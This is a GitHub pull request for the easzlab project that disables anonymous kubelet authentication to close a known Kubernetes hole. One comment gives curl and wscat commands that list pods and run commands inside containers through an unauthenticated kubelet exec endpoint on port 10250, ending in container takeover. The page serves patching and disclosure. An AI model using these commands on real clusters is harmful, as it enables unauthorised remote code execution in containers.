Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

修复kubelet安全策略 #192

Merged
merged 1 commit into from
May 17, 2018
Merged

修复kubelet安全策略 #192

merged 1 commit into from
May 17, 2018

Conversation

cqspirit
Copy link
Contributor

https://kubernetes.io/docs/admin/kubelet-authentication-authorization/
By default, requests to the kubelet’s HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a username of system:anonymous and a group of system:unauthenticated.

To disable anonymous access and send 401 Unauthorized responses to unauthenticated requests:

start the kubelet with the --anonymous-auth=false flag

@cqspirit
修复kubelet安全策略
c5d576a 
https://kubernetes.io/docs/admin/kubelet-authentication-authorization/
By default, requests to the kubelet’s HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a username of system:anonymous and a group of system:unauthenticated.

To disable anonymous access and send 401 Unauthorized responses to unauthenticated requests:

start the kubelet with the --anonymous-auth=false flag
@gjmzj
Copy link
Collaborator

gjmzj commented May 17, 2018

感谢提供安全漏洞相关信息;
为较好解决这个问题,需要多处修改,我会先接受PR,然后继续修改

@gjmzj gjmzj merged commit 6b6de78 into easzlab:master May 17, 2018
@cqspirit
Copy link
Contributor Author

好的,我也正在解决这个问题,涉及的修改很多,目前kubulet和api server访问正常了,但是kubectl logs不能使用,dashboard也部署不上,还在解决。。

@cqspirit
Copy link
Contributor Author

具体测试办法是:
curl --insecure https://kube-node-here:10250/pods | jq
curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://kube-node-here:10250/exec///?command=touch&command=hello_world&input=1&output=1&tty=1"
返回结果为:
< HTTP/2 302
< location: /cri/exec/PfWkLulG
< content-type: text/plain; charset=utf-8
< content-length: 0
< date: Tue, 13 Mar 2018 19:21:00 GMT
然后执行
wscat -c "https://kube-node-here:10250/cri/exec/PfWkLulG" --no-check
即可获得容器的控制权。

详见:
https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
kubernetes/kubernetes#59666

@jy2156121 jy2156121 mentioned this pull request Aug 15, 2018
Closed
@yinggux yinggux mentioned this pull request Nov 14, 2018
Closed
@plusices plusices mentioned this pull request Nov 29, 2018
Closed
@frankzhzh frankzhzh mentioned this pull request May 7, 2019
Closed
@wrightxu wrightxu mentioned this pull request May 7, 2019
Closed
@hurricane1988 hurricane1988 mentioned this pull request Oct 20, 2019
Closed
@hom7 hom7 mentioned this pull request Oct 28, 2019
Closed
@WadeWuu WadeWuu mentioned this pull request Dec 1, 2019
Closed
@shizy123 shizy123 mentioned this pull request Dec 3, 2019
Closed
@yananshiwo yananshiwo mentioned this pull request Apr 16, 2020
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@cqspirit @gjmzj